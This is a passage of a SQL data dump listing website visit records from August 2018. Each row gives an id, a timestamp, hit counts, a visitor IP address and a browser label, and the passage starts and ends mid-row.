0,'54.36.148.236','other'),(293456,1535088405,1,1,0,0,'54.36.149.12','other'),(293457,1535088494,1,1,0,0,'54.36.149.94','other'),(293458,1535088763,1,1,0,0,'54.36.149.2','other'),(293459,1535088889,1,1,0,0,'54.36.148.15','other'),(293460,1535089536,1,1,0,0,'54.36.149.80','other'),(293461,1535090009,1,1,0,0,'54.36.148.116','other'),(293462,1535090061,1,1,0,0,'54.165.59.7','other'),(293463,1535090283,1,1,0,0,'8.29.198.25','other'),(293464,1535090375,1,1,0,0,'54.36.148.146','other'),(293465,1535090425,1,1,0,0,'54.36.148.61','other'),(293466,1535090633,1,1,0,0,'54.36.148.10','other'),(293467,1535090862,1,1,0,0,'54.36.148.84','other'),(293468,1535090872,1,1,0,0,'54.36.148.200','other'),(293469,1535090942,1,1,0,0,'54.36.148.111','other'),(293470,1535091235,1,1,0,0,'54.165.59.7','other'),(293471,1535091319,1,1,0,0,'84.19.181.25','other'),(293472,1535091956,1,1,0,0,'54.36.149.76','other'),(293473,1535092089,1,1,0,0,'141.8.142.74','other'),(293474,1535092546,1,1,0,0,'54.36.149.27','other'),(293475,1535092570,1,1,0,0,'54.36.149.59','other'),(293476,1535092748,1,1,0,0,'54.36.148.216','other'),(293477,1535093019,2,2,0,0,'141.8.142.74','other'),(293478,1535093412,1,1,0,0,'54.36.148.35','other'),(293479,1535093438,1,1,0,0,'54.165.59.7','other'),(293480,1535093473,1,1,0,0,'134.249.81.203','chrome'),(293481,1535093577,1,1,0,0,'54.36.148.230','other'),(293482,1535093656,1,1,0,0,'54.36.148.248','other'),(293483,1535093775,1,1,0,0,'37.9.113.101','other'),(293484,1535093911,1,1,0,0,'216.244.66.241','other'),(293485,1535093960,1,1,0,0,'54.36.149.90','other'),(293486,1535094037,1,1,0,0,'54.36.148.26','other'),(293487,1535094296,1,1,0,0,'54.36.149.76','other'),(293488,1535094316,1,1,0,0,'54.36.149.58','other'),(293489,1535094329,1,1,0,0,'54.36.148.54','other'),(293490,1535094769,1,1,0,0,'54.36.148.214','other'),(293491,1535094916,1,1,0,0,'87.233.197.114','other'),(293492,1535095072,1,1,0,0,'207.46.13.180','other'),(293493,1535095079,1,1,0,0,'54.36.148.235','other'),(293494,1535095488,1,1,0,0,'54.36.148.64','other'),(293495,1535095578,1,1,0,0,'54.36.148.77','other'),(293496,1535095743,1,1,0,0,'54.36.148.104','other'),(293497,1535095889,1,1,0,0,'66.249.66.61','chrome'),(293498,1535095910,1,1,0,0,'54.36.148.249','other'),(293499,1535096526,1,1,0,0,'54.36.148.14','other'),(293500,1535096760,1,1,0,0,'54.36.148.127','other'),(293501,1535096766,1,1,0,0,'54.36.149.2','other'),(293502,1535096783,1,1,0,0,'52.53.201.78','chrome'),(293503,1535096997,1,0,1,0,'66.249.66.57',''),(293504,1535097010,1,0,1,0,'66.249.66.155',''),(293505,1535097012,1,0,1,0,'66.249.66.59',''),(293506,1535097319,1,1,0,0,'141.8.142.74','other'),(293507,1535097382,1,1,0,0,'54.36.148.54','other'),(293508,1535097709,1,1,0,0,'54.36.148.196','other'),(293509,1535097854,1,1,0,0,'54.36.148.185','other'),(293510,1535097931,2,2,0,0,'87.250.224.46','other'),(293511,1535098112,1,1,0,0,'54.36.148.166','other'),(293512,1535098123,1,1,0,0,'54.36.148.182','other'),(293513,1535098276,1,1,0,0,'54.36.148.172','other'),(293514,1535098551,1,1,0,0,'157.55.39.235','other'),(293515,1535098681,1,1,0,0,'54.36.148.97','other'),(293516,1535098806,13,13,0,0,'46.4.63.250','other'),(293517,1535098809,1,1,0,0,'216.244.66.241','other'),(293518,1535098928,1,1,0,0,'54.36.148.138','other'),(293519,1535098946,1,0,1,0,'66.249.66.155',''),(293520,1535099118,1,1,0,0,'54.36.148.218','other'),(293521,1535099490,1,1,0,0,'54.36.148.89','other'),(293523,1535099517,1,1,0,0,'66.249.66.61','chrome'),(293524,1535099563,1,0,1,0,'66.249.66.156',''),(293525,1535099741,1,1,0,0,'54.36.148.229','other'),(293526,1535099790,1,1,0,0,'54.36.148.105','other'),(293527,1535099875,1,0,1,0,'66.249.66.157',''),(293528,1535099967,1,1,0,0,'5.188.210.44','firefox'),(293529,1535100380,1,1,0,0,'54.36.148.226','other'),(293530,1535101130,1,1,0,0,'8.29.198.25','other'),(293531,1535101625,1,1,0,0,'54.36.148.82','other'),(293532,1535101638,1,1,0,0,'54.36.148.175','other'),(293533,1535101667,1,0,1,0,'66.249.66.155',''),(293534,1535101827,1,1,0,0,'54.36.148.21','other'),(293535,1535101974,1,1,0,0,'54.36.149.92','other'),(293536,1535102083,2,2,0,0,'141.8.142.74','other'),(293537,1535102166,1,1,0,0,'185.220.101.5','other'),(293538,1535102234,1,1,0,0,'54.36.148.70','other'),(293539,1535102256,1,0,1,0,'66.249.66.156',''),(293540,1535102275,1,1,0,0,'54.36.149.86','other'),(293541,1535102294,1,1,0,0,'54.36.149.67','other'),(293542,1535102305,1,1,0,0,'54.36.148.103','other'),(293543,1535102660,1,1,0,0,'54.36.148.96','other'),(293544,1535103208,1,1,0,0,'178.154.171.88','other'),(293545,1535103528,1,1,0,0,'54.36.148.91','other'),(293546,1535103555,1,1,0,0,'54.36.148.19','other'),(293547,1535103620,1,1,0,0,'141.8.142.74','other'),(293548,1535103796,1,1,0,0,'54.36.148.64','other'),(293549,1535103831,1,1,0,0,'54.36.148.100','other'),(293550,1535104081,1,0,1,0,'66.249.66.157',''),(293551,1535104090,2,0,2,0,'66.249.66.155',''),(293552,1535104284,1,1,0,0,'91.209.11.236','other'),(293553,1535104353,1,1,0,0,'66.249.66.57','chrome'),(293554,1535104372,1,1,0,0,'54.36.149.39','other'),(293555,1535104495,1,1,0,0,'54.36.148.143','other'),(293556,1535104857,2,0,2,0,'66.249.66.156',''),(293557,1535105214,1,1,0,0,'54.36.148.52','other'),(293558,1535105304,1,1,0,0,'54.36.148.191','other'),(293559,1535105689,2,1,1,0,'66.249.66.155',''),(293560,1535105741,1,1,0,0,'51.15.65.25','other'),(293561,1535105876,1,1,0,0,'54.36.149.13','other'),(293562,1535106105,1,1,0,0,'54.36.148.176','other'),(293563,1535106219,1,1,0,0,'141.8.142.74','other'),(293564,1535106449,1,1,0,0,'54.36.148.175','other'),(293565,1535106566,1,1,0,0,'66.249.66.57','chrome'),(293566,1535106634,1,1,0,0,'54.36.149.4','other'),(293567,1535106654,1,1,0,0,'54.36.149.40','other'),(293568,1535106678,1,1,0,0,'54.36.148.86','other'),(293569,1535106727,1,1,0,0,'54.36.148.249','other'),(293570,1535106792,1,1,0,0,'91.209.11.236','other'),(293571,1535107061,1,1,0,0,'54.36.149.86','other'),(293572,1535107110,1,1,0,0,'54.36.148.71','other'),(293573,1535107294,1,0,1,0,'66.249.66.155',''),(293574,1535107317,2,0,2,0,'66.249.66.156',''),(293575,1535107384,1,0,1,0,'66.249.66.157',''),(293576,1535107521,1,1,0,0,'141.8.142.74','other'),(293577,1535107542,1,1,0,0,'54.36.149.90','other'),(293578,1535108652,1,1,0,0,'54.36.149.39','other'),(293579,1535108737,1,1,0,0,'54.36.148.154','other'),(293580,1535108908,1,0,1,0,'66.249.66.156',''),(293581,1535108922,1,1,0,0,'54.36.148.199','other'),(293582,1535109124,1,1,0,0,'87.250.224.46','other'),(293583,1535109313,1,1,0,0,'54.36.148.187','other'),(293584,1535109333,1,1,0,0,'185.220.101.0','other'),(293585,1535109460,1,1,0,0,'54.36.148.194','other'),(293586,1535109476,1,1,0,0,'141.8.142.74','other'),(293587,1535109482,3,0,3,0,'66.249.66.157',''),(293588,1535109727,1,1,0,0,'54.36.148.119','other'),(293589,1535109768,1,1,0,0,'178.154.171.88','other'),(293590,1535109886,1,1,0,0,'54.36.148.94','other'),(293591,1535109953,3,0,3,0,'66.249.66.155',''),(293592,1535109963,1,1,0,0,'54.36.148.110','other'),(293593,1535110031,2,0,2,0,'66.249.66.156',''),(293594,1535110307,1,1,0,0,'54.36.149.101','other'),(293595,1535110422,1,1,0,0,'54.36.149.36','other'),(293596,1535110530,1,1,0,0,'91.214.209.229','chrome'),(293597,1535110563,1,1,0,0,'54.36.148.186','other'),(293598,1535110578,1,1,0,0,'54.36.148.37','other'),(293599,1535110587,1,1,0,0,'216.244.66.241','other'),(293600,1535110644,3,0,3,0,'66.249.66.157',''),(293601,1535110722,1,1,0,0,'141.8.142.74','other'),(293602,1535110740,1,1,0,0,'178.154.171.88','other'),(293603,1535110932,1,0,1,0,'66.249.66.155',''),(293604,1535111175,1,1,0,0,'54.36.148.21','other'),(293605,1535111358,1,1,0,0,'54.36.148.221','other'),(293606,1535111496,1,1,0,0,'54.36.148.250','other'),(293607,1535111509,1,1,0,0,'54.36.148.243','other'),(293608,1535111526,1,1,0,0,'54.36.149.87','other'),(293609,1535111572,2,2,0,0,'54.36.148.74','other'),(293610,1535111588,1,1,0,0,'54.36.149.24','other'),(293611,1535111939,2,0,2,0,'66.249.66.156',''),(293612,1535111944,2,0,2,0,'66.249.66.61',''),(293613,1535111975,1,1,0,0,'8.29.198.25','other'),(293614,1535112007,2,0,2,0,'66.249.66.157',''),(293615,1535112292,1,1,0,0,'54.36.148.211','other'),(293616,1535112448,1,1,0,0,'54.36.148.208','other'),(293617,1535113237,1,0,1,0,'66.249.66.157',''),(293618,1535113255,2,0,2,0,'66.249.66.156',''),(293619,1535113583,1,0,1,0,'66.249.66.61',''),(293620,1535113653,1,1,0,0,'54.36.148.171','other'),(293621,1535113882,1,1,0,0,'54.36.148.82','other'),(293622,1535113899,1,1,0,0,'54.36.148.248','other'),(293623,1535114036,1,1,0,0,'207.46.13.180','other'),(293624,1535114083,1,1,0,0,'54.36.148.181','other'),(293625,1535114357,1,1,0,0,'178.154.171.88','other'),(293626,1535114509,1,1,0,0,'54.36.149.84','other'),(293627,1535114588,1,1,0,0,'54.36.149.3','other'),(293628,1535114591,1,1,0,0,'91.196.178.135','chrome'),(293629,1535114686,1,1,0,0,'54.36.148.231','other'),(293630,1535114689,5,0,5,0,'66.249.66.157',''),(293631,1535114776,1,1,0,0,'91.196.178.60','chrome'),(293632,1535114799,2,0,2,0,'66.249.66.155',''),(293633,1535114854,1,0,1,0,'66.249.66.57',''),(293634,1535114926,1,1,0,0,'178.92.140.47','chrome'),(293635,1535115108,3,0,3,0,'66.249.66.156',''),(293636,1535115190,1,1,0,0,'54.36.148.16','other'),(293637,1535115896,1,1,0,0,'54.36.148.161','other'),(293638,1535115980,1,1,0,0,'54.36.149.40','other'),(293639,1535116313,4,0,4,0,'66.249.66.155',''),(293640,1535116328,1,1,0,0,'54.36.149.65','other'),(293641,1535116345,3,0,3,0,'66.249.66.156',''),(293642,1535116373,1,0,1,0,'66.249.66.61',''),(293643,1535116388,1,1,0,0,'54.36.148.45','other'),(293644,1535116480,2,2,0,0,'216.244.66.241','other'),(293645,1535116783,1,1,0,0,'54.36.148.63','other'),(293646,1535116793,1,1,0,0,'54.36.149.56','other'),(293647,1535116930,1,1,0,0,'54.36.149.13','other'),(293648,1535117023,1,1,0,0,'141.8.142.74','other'),(293649,1535117062,2,2,0,0,'178.154.171.88','other'),(293650,1535117210,1,0,1,0,'66.249.66.59',''),(293651,1535117235,1,1,0,0,'87.250.224.46','other'),(293652,1535117250,4,1,3,0,'66.249.66.155',''),(293653,1535117281,1,1,0,0,'91.196.178.65','firefox'),(293654,1535117618,1,1,0,0,'54.36.149.41','other'),(293655,1535117799,1,1,0,0,'207.46.13.180','other'),(293656,1535117810,1,1,0,0,'54.36.148.193','other'),(293657,1535117897,1,1,0,0,'54.36.149.47','other'),(293658,1535118222,4,0,4,0,'66.249.66.156',''),(293659,1535118326,2,0,2,0,'66.249.66.155',''),(293660,1535118773,1,1,0,0,'54.36.149.76','other'),(293661,1535118830,1,1,0,0,'54.36.148.127','other'),(293662,1535118876,1,1,0,0,'54.36.149.104','other'),(293663,1535119546,1,1,0,0,'54.36.148.61','other'),(293664,1535119658,1,1,0,0,'54.36.148.94','other'),(293665,1535119907,1,1,0,0,'54.36.149.60','other'),(293666,1535119940,1,1,0,0,'54.36.148.113','other'),(293667,1535120147,2,0,2,0,'66.249.66.156',''),(293668,1535120161,1,1,0,0,'185.220.101.5','other'),(293669,1535120329,1,1,0,0,'141.8.142.74','other'),(293670,1535120409,2,0,2,0,'66.249.66.157',''),(293671,1535120424,1,0,1,0,'66.249.66.57',''),(293672,1535120585,2,2,0,0,'40.77.167.55','other'),(293673,1535120834,1,1,0,0,'54.36.148.80','other'),(293674,1535120997,1,0,1,0,'66.249.66.155',''),(293675,1535121239,2,0,2,0,'66.249.66.156',''),(293676,1535121370,4,2,2,0,'66.249.66.155',''),(293677,1535121393,1,1,0,0,'54.36.148.193','other'),(293678,1535121697,2,0,2,0,'66.249.66.157',''),(293679,1535121959,10,10,0,0,'40.77.167.55','other'),(293680,1535121968,9,9,0,0,'157.55.39.235','other'),(293681,1535121978,13,13,0,0,'207.46.13.180','other'),(293682,1535121990,12,12,0,0,'40.77.167.80','other'),(293683,1535122128,1,1,0,0,'54.36.148.242','other'),(293684,1535122273,1,1,0,0,'54.36.148.162','other'),(293685,1535122444,2,0,2,0,'66.249.66.156',''),(293686,1535122500,1,1,0,0,'54.36.148.207','other'),(293687,1535122508,1,1,0,0,'37.9.113.182','other'),(293688,1535122512,1,1,0,0,'178.154.200.41','other'),(293689,1535122582,1,1,0,0,'52.5.122.69','firefox'),(293690,1535122673,2,0,2,0,'66.249.66.155',''),(293691,1535122848,1,1,0,0,'8.29.198.27','other'),(293692,1535123420,1,0,1,0,'66.249.66.156',''),(293693,1535123589,1,1,0,0,'54.36.148.93','other'),(293694,1535123738,1,1,0,0,'80.127.116.96','other'),(293695,1535123792,1,1,0,0,'54.36.148.102','other'),(293696,1535123799,1,1,0,0,'54.36.148.176','other'),(293697,1535124511,1,1,0,0,'82.207.49.122','chrome'),(293698,1535124591,1,1,0,0,'54.36.148.79','other'),(293699,1535124879,1,1,0,0,'54.36.148.114','other'),(293700,1535125000,1,0,1,0,'66.249.66.57',''),(293701,1535125067,2,2,0,0,'141.8.142.74','other'),(293702,1535125081,1,1,0,0,'54.36.148.138','other'),(293703,1535125100,1,0,1,0,'66.249.66.156',''),(293704,1535125117,1,0,1,0,'66.249.66.155',''),(293705,1535125146,1,1,0,0,'54.36.149.8','other'),(293706,1535125286,1,1,0,0,'17.58.98.62','other'),(293707,1535125305,1,1,0,0,'54.36.148.42','other'),(293708,1535125448,1,1,0,0,'91.196.178.129','firefox'),(293709,1535125527,1,0,1,0,'66.249.66.157',''),(293710,1535125604,2,2,0,0,'216.244.66.241','other'),(293711,1535125905,1,1,0,0,'54.36.148.153','other'),(293712,1535125996,1,1,0,0,'54.36.148.179','other'),(293713,1535126137,1,1,0,0,'54.36.148.226','other'),(293714,1535126338,2,0,2,0,'66.249.66.156',''),(293715,1535126413,1,1,0,0,'178.154.171.88','other'),(293716,1535126849,3,1,2,0,'66.249.66.155',''),(293717,1535127332,1,1,0,0,'185.220.101.25','other'),(293718,1535127399,1,1,0,0,'54.36.148.235','other'),(293719,1535127405,1,1,0,0,'54.36.148.236','other'),(293720,1535127701,1,0,1,0,'66.249.66.157',''),(293721,1535127824,2,2,0,0,'54.36.148.243','other'),(293722,1535128617,1,1,0,0,'54.36.148.12','other'),(293723,1535128701,1,1,0,0,'66.249.66.59','chrome'),(293724,1535128712,1,0,1,0,'66.249.66.157',''),(293725,1535128843,1,1,0,0,'54.36.148.154','other'),(293726,1535128950,1,1,0,0,'54.36.148.20','other'),(293727,1535128982,1,1,0,0,'54.36.148.214','other'),(293728,1535129258,5,1,4,0,'66.249.66.155',''),(293729,1535129340,1,1,0,0,'54.36.149.82','other'),(293731,1535129482,1,1,0,0,'54.36.149.99','other'),(293732,1535129566,1,1,0,0,'54.36.149.86','other'),(293733,1535129612,1,1,0,0,'54.36.148.204','other'),(293734,1535129615,1,1,0,0,'54.36.148.50','other'),(293735,1535129666,2,0,2,0,'66.249.66.156',''),(293736,1535129677,1,1,0,0,'141.8.142.74','other'),(293737,1535129751,1,0,1,0,'66.249.66.157',''),(293738,1535129795,1,1,0,0,'54.36.148.149','other'),(293739,1535130174,1,1,0,0,'54.36.149.85','other'),(293740,1535130219,1,1,0,0,'54.36.148.24','other'),(293741,1535130356,1,1,0,0,'54.36.148.67','other'),(293742,1535130637,1,1,0,0,'54.36.148.155','other'),(293743,1535130789,3,0,3,0,'66.249.66.157',''),(293744,1535130927,1,1,0,0,'78.109.23.1','other'),(293745,1535130977,1,0,1,0,'66.249.66.57',''),(293746,1535131052,1,1,0,0,'92.113.189.235','chrome'),(293747,1535131367,1,1,0,0,'54.36.149.40','other'),(293748,1535131463,1,1,0,0,'54.36.148.31','other'),(293749,1535131681,3,0,3,0,'66.249.66.156',''),(293750,1535132000,1,1,0,0,'54.36.149.87','other'),(293751,1535132047,2,2,0,0,'95.135.241.195','firefox'),(293752,1535132165,1,1,0,0,'180.76.15.144','other'),(293753,1535132184,1,1,0,0,'54.36.148.255','other'),(293754,1535132323,1,1,0,0,'54.36.149.29','other'),(293755,1535132345,1,1,0,0,'54.36.149.10','other'),(293756,1535132520,1,1,0,0,'54.36.148.224','other'),(293757,1535132759,1,1,0,0,'216.244.66.241','other'),(293758,1535133708,1,1,0,0,'8.29.198.26','other'),(293759,1535133713,2,0,2,0,'66.249.66.155',''),(293760,1535133762,1,1,0,0,'54.36.148.19','other'),(293761,1535133765,2,0,2,0,'66.249.66.156',''),(293762,1535133817,3,0,3,0,'66.249.66.157',''),(293763,1535133963,1,1,0,0,'91.196.178.163','other'),(293764,1535134006,1,1,0,0,'54.36.149.107','other'),(293765,1535134111,1,1,0,0,'54.36.149.79','other'),(293766,1535134148,1,1,0,0,'54.36.149.77','other'),(293767,1535134175,1,1,0,0,'141.8.142.74','other'),(293768,1535134311,1,1,0,0,'54.36.149.101','other'),(293769,1535134370,1,1,0,0,'54.36.148.248','other'),(293770,1535134383,1,1,0,0,'54.36.148.108','other'),(293771,1535134471,1,1,0,0,'54.36.148.219','other'),(293772,1535134512,1,1,0,0,'54.36.149.26','other'),(293773,1535134575,1,1,0,0,'185.220.101.34','other'),(293774,1535134784,1,0,1,0,'66.249.66.57',''),(293775,1535134786,1,0,1,0,'66.249.66.155',''),(293776,1535134989,1,1,0,0,'54.36.148.229','other'),(293777,1535135056,1,1,0,0,'54.36.148.94','other'),(293778,1535135074,2,2,0,0,'178.154.171.88','other'),(293779,1535135089,1,1,0,0,'95.163.255.99','other'),(293780,1535135155,1,1,0,0,'37.9.113.182','other'),(293781,1535135161,3,3,0,0,'141.8.142.74','other'),(293782,1535135218,1,1,0,0,'54.36.148.134','other'),(293783,1535135219,1,1,0,0,'54.36.149.47','other'),(293784,1535135221,1,1,0,0,'54.36.148.53','other'),(293785,1535135718,3,0,3,0,'66.249.66.155',''),(293786,1535135724,1,1,0,0,'54.36.149.2','other'),(293787,1535135946,1,1,0,0,'54.36.148.151','other'),(293788,1535136334,2,0,2,0,'66.249.66.156',''),(293789,1535136597,1,1,0,0,'91.196.178.163','other'),(293790,1535136637,1,1,0,0,'54.36.148.73','other'),(293791,1535136807,2,0,2,0,'66.249.66.157',''),(293792,1535136879,1,1,0,0,'91.196.178.84','chrome'),(293793,1535136932,1,0,1,0,'66.249.66.155',''),(293794,1535136956,1,1,0,0,'54.36.149.13','other'),(293795,1535137101,1,1,0,0,'54.36.148.227','other'),(293796,1535137287,1,1,0,0,'91.121.83.160','chrome'),(293797,1535137451,1,1,0,0,'87.250.224.46','other'),(293798,1535137548,1,1,0,0,'54.36.148.134','other'),(293799,1535137617,1,1,0,0,'40.77.167.55','other'),(293800,1535137705,1,1,0,0,'54.36.148.26','other'),(293801,1535137759,1,1,0,0,'54.36.149.54','other'),(293802,1535138143,1,1,0,0,'54.36.148.156','other'),(293803,1535138201,1,1,0,0,'77.247.181.163','other'),(293804,1535138565,1,1,0,0,'54.36.148.167','other'),(293805,1535138676,1,1,0,0,'37.9.113.115','other'),(293806,1535138691,1,1,0,0,'54.36.148.217','other'),(293807,1535138894,1,1,0,0,'54.36.148.246','other'),(293808,1535139147,1,1,0,0,'95.134.171.112','chrome'),(293809,1535139262,1,1,0,0,'54.36.148.112','other'),(293810,1535139360,1,1,0,0,'54.36.148.52','other'),(293811,1535139736,1,0,1,0,'66.249.66.157',''),(293812,1535140031,1,0,1,0,'66.249.66.156',''),(293813,1535140118,1,1,0,0,'54.36.148.15','other'),(293814,1535140158,1,0,1,0,'66.249.66.59',''),(293815,1535140172,1,1,0,0,'54.36.148.90','other'),(293816,1535140581,1,1,0,0,'54.36.148.251','other'),(293817,1535140601,1,1,0,0,'216.244.66.241','other'),(293818,1535140628,1,1,0,0,'54.36.148.14','other'),(293819,1535140693,2,0,2,0,'66.249.66.157',''),(293820,1535140763,1,1,0,0,'130.180.212.123','chrome'),(293821,1535140927,1,1,0,0,'54.36.149.62','other'),(293822,1535141210,1,0,1,0,'66.249.66.155',''),(293823,1535141501,1,1,0,0,'37.9.113.182','other'),(293824,1535141803,1,0,1,0,'66.249.66.157',''),(293825,1535141922,1,1,0,0,'54.36.148.118','other'),(293826,1535142268,1,1,0,0,'54.36.148.86','other'),(293827,1535142393,1,1,0,0,'103.23.155.187','firefox'),(293828,1535142483,2,0,2,0,'66.249.66.156',''),(293829,1535142517,1,1,0,0,'54.36.149.104','other'),(293830,1535142566,1,1,0,0,'54.36.148.94','other'),(293831,1535142588,1,1,0,0,'66.249.66.59','chrome'),(293832,1535142923,1,1,0,0,'54.36.149.21','other'),(293833,1535143183,1,1,0,0,'51.255.65.46','other'),(293834,1535143254,2,2,0,0,'141.8.142.74','other'),(293835,1535143329,1,1,0,0,'54.36.148.150','other'),(293836,1535143652,1,1,0,0,'54.36.148.133','other'),(293837,1535144009,1,1,0,0,'54.36.149.15','other'),(293838,1535144042,1,0,1,0,'66.249.66.156',''),(293839,1535144123,2,2,0,0,'178.154.171.88','other'),(293840,1535144324,1,1,0,0,'141.8.142.74','other'),(293841,1535144399,1,1,0,0,'66.249.66.157','chrome'),(293842,1535144428,1,1,0,0,'54.36.148.195','other'),(293843,1535144548,1,1,0,0,'8.29.198.25','other'),(293844,1535144603,1,1,0,0,'54.36.149.19','other'),(293845,1535144632,1,1,0,0,'54.36.148.146','other'),(293846,1535144975,2,2,0,0,'216.244.66.241','other'),(293847,1535145277,1,1,0,0,'54.36.148.215','other'),(293848,1535145355,1,0,1,0,'66.249.66.156',''),(293849,1535145403,1,0,1,0,'66.249.66.155',''),(293850,1535146223,1,1,0,0,'46.211.154.165','chrome'),(293851,1535146412,1,1,0,0,'37.9.113.182','other'),(293852,1535146800,1,1,0,0,'87.250.224.46','other'),(293853,1535146815,2,2,0,0,'178.154.171.88','other'),(293854,1535146821,1,1,0,0,'141.8.142.74','other'),(293855,1535147720,2,0,2,0,'66.249.66.155',''),(293856,1535148674,1,1,0,0,'141.8.142.74','other'),(293858,1535148942,1,1,0,0,'51.15.86.162','other'),(293859,1535149354,1,1,0,0,'37.9.113.182','other'),(293860,1535150517,1,1,0,0,'141.8.142.74','other'),(293861,1535151236,2,0,2,0,'66.249.66.155',''),(293862,1535151330,1,0,1,0,'66.249.66.156',''),(293863,1535151450,2,0,2,0,'66.249.66.157',''),(293864,1535151696,1,1,0,0,'95.128.165.6','firefox'),(293865,1535151825,1,1,0,0,'66.249.66.156','chrome'),(293866,1535152207,1,1,0,0,'141.8.142.74','other'),(293867,1535152536,1,1,0,0,'62.210.116.201','other'),(293868,1535152582,1,1,0,0,'40.77.167.80','other'),(293869,1535153112,1,1,0,0,'178.154.171.88','other'),(293870,1535153128,1,1,0,0,'91.121.83.160','chrome'),(293871,1535153194,1,0,1,0,'66.249.66.157',''),(293872,1535153536,1,0,1,0,'66.249.66.155',''),(293873,1535154154,1,0,1,0,'66.249.66.157',''),(293874,1535154446,2,0,2,0,'66.249.66.155',''),(293875,1535154855,1,1,0,0,'178.154.171.88','other'),(293876,1535155397,1,1,0,0,'8.29.198.26','other'),(293877,1535155777,2,0,2,0,'66.249.66.155',''),(293878,1535155894,2,0,2,0,'66.249.66.156',''),(293879,1535155967,2,0,2,0,'66.249.66.157',''),(293880,1535156124,1,1,0,0,'79.137.68.85','other'),(293881,1535156313,1,1,0,0,'216.244.66.241','other'),(293882,1535156999,1,1,0,0,'180.76.15.153','other'),(293883,1535157089,1,1,0,0,'66.249.66.155','chrome'),(293884,1535157528,2,2,0,0,'178.154.171.88','other'),(293885,1535158618,1,1,0,0,'54.36.148.177','other'),(293886,1535158647,5,0,5,0,'66.249.66.155',''),(293887,1535159068,1,1,0,0,'207.46.13.180','other'),(293888,1535159091,1,1,0,0,'54.36.148.189','other'),(293889,1535159123,1,1,0,0,'54.36.149.18','other'),(293890,1535159263,1,1,0,0,'54.36.148.244','other'),(293891,1535159717,1,1,0,0,'176.126.252.12','other'),(293892,1535159872,1,0,1,0,'66.249.66.155',''),(293893,1535159894,1,1,0,0,'54.36.148.153','other'),(293894,1535159931,1,1,0,0,'54.36.149.103','other'),(293895,1535160088,1,1,0,0,'178.154.171.55','other'),(293896,1535160260,1,1,0,0,'178.154.171.4','other'),(293897,1535160418,1,1,0,0,'54.36.149.86','other'),(293898,1535160621,1,1,0,0,'54.36.149.61','other'),(293899,1535160664,1,0,1,0,'66.249.66.157',''),(293900,1535160761,1,1,0,0,'54.36.148.109','other'),(293901,1535160794,4,4,0,0,'141.8.142.74','other'),(293902,1535160862,1,1,0,0,'54.36.148.184','other'),(293903,1535161117,1,1,0,0,'54.36.148.91','other'),(293904,1535161694,1,1,0,0,'54.36.148.142','other'),(293905,1535161959,6,6,0,0,'141.8.142.74','other'),(293906,1535162439,2,0,2,0,'66.249.66.155',''),(293907,1535162563,20,20,0,0,'178.151.245.174','other'),(293908,1535162604,1,1,0,0,'87.250.224.46','other'),(293909,1535162846,1,1,0,0,'40.77.167.55','other'),(293910,1535162853,3,0,3,0,'66.249.66.157',''),(293911,1535163333,1,1,0,0,'51.15.82.2','other'),(293912,1535163609,2,2,0,0,'178.154.171.88','other'),(293913,1535163789,1,0,1,0,'66.249.66.156',''),(293914,1535164257,3,3,0,0,'141.8.142.74','other'),(293915,1535164274,1,1,0,0,'87.250.224.46','other'),(293916,1535164373,1,1,0,0,'216.244.66.241','other'),(293917,1535164551,1,1,0,0,'178.154.200.41','other'),(293918,1535164941,1,1,0,0,'178.154.171.88','other'),(293919,1535165509,1,1,0,0,'180.76.15.28','other'),(293920,1535165999,2,0,2,0,'66.249.66.157',''),(293921,1535166058,1,1,0,0,'141.8.142.74','other'),(293922,1535166189,1,0,1,0,'66.249.66.155',''),(293923,1535166233,1,1,0,0,'8.29.198.25','other'),(293924,1535166712,1,1,0,0,'178.154.171.88','other'),(293925,1535166919,1,1,0,0,'51.15.80.14','other'),(293926,1535167888,1,1,0,0,'216.244.66.241','other'),(293927,1535168033,4,4,0,0,'141.8.142.74','other'),(293928,1535168152,2,2,0,0,'178.154.171.88','other'),(293929,1535169108,1,1,0,0,'91.209.11.236','other'),(293930,1535169744,3,3,0,0,'141.8.142.74','other'),(293931,1535169883,1,0,1,0,'66.249.66.155',''),(293932,1535169980,1,0,1,0,'66.249.66.157',''),(293933,1535170521,1,1,0,0,'178.17.166.149','other'),(293934,1535170989,1,1,0,0,'178.154.171.88','other'),(293935,1535171454,1,0,1,0,'66.249.66.155',''),(293936,1535171492,1,0,1,0,'66.249.66.157',''),(293937,1535172046,1,1,0,0,'95.163.255.156','other'),(293938,1535172204,1,0,1,0,'66.249.66.57',''),(293939,1535173237,1,0,1,0,'66.249.66.157',''),(293940,1535173542,1,1,0,0,'54.36.148.136','other'),(293941,1535173729,1,1,0,0,'54.36.148.216','other'),(293942,1535173808,2,2,0,0,'141.8.142.74','other'),(293943,1535174117,1,1,0,0,'62.141.39.8','other'),(293944,1535174158,1,1,0,0,'54.36.148.132','other'),(293945,1535174331,1,0,1,0,'66.249.66.157',''),(293946,1535174505,1,1,0,0,'54.36.148.86','other'),(293947,1535174588,1,1,0,0,'54.36.148.142','other'),(293948,1535174709,1,1,0,0,'207.46.13.180','other'),(293949,1535174744,1,1,0,0,'13.77.169.115','other'),(293950,1535175041,1,1,0,0,'54.36.149.85','other'),(293951,1535175179,1,0,1,0,'66.249.66.156',''),(293952,1535175358,1,1,0,0,'54.36.148.126','other'),(293953,1535175422,1,1,0,0,'54.36.148.167','other'),(293954,1535175447,3,3,0,0,'216.244.66.241','other'),(293955,1535175923,1,1,0,0,'54.36.149.36','other'),(293956,1535175993,1,1,0,0,'54.36.148.64','other'),(293957,1535176016,1,1,0,0,'54.36.149.52','other'),(293958,1535176144,1,1,0,0,'54.36.148.215','other'),(293959,1535176370,2,2,0,0,'141.8.142.74','other'),(293960,1535176434,3,0,3,0,'66.249.66.155',''),(293961,1535176787,1,1,0,0,'54.36.148.112','other'),(293962,1535176963,1,1,0,0,'54.36.148.195','other'),(293963,1535176979,1,1,0,0,'95.84.221.152','msie'),(293964,1535176981,1,1,0,0,'128.72.149.90','msie'),(293965,1535177007,1,1,0,0,'54.36.148.113','other'),(293966,1535177029,1,1,0,0,'54.36.148.47','other'),(293967,1535177034,1,1,0,0,'54.36.148.39','other'),(293968,1535177055,2,2,0,0,'178.154.171.88','other'),(293969,1535177065,1,0,1,0,'66.249.66.156',''),(293970,1535177087,1,1,0,0,'8.29.198.26','other'),(293971,1535177191,1,0,1,0,'66.249.66.59',''),(293972,1535177202,1,1,0,0,'54.36.148.59','other'),(293973,1535177291,1,1,0,0,'141.8.142.74','other'),(293974,1535177436,1,1,0,0,'54.36.148.97','other'),(293975,1535177482,1,1,0,0,'54.36.148.252','other'),(293976,1535177530,1,1,0,0,'54.36.149.9','other'),(293977,1535177716,1,1,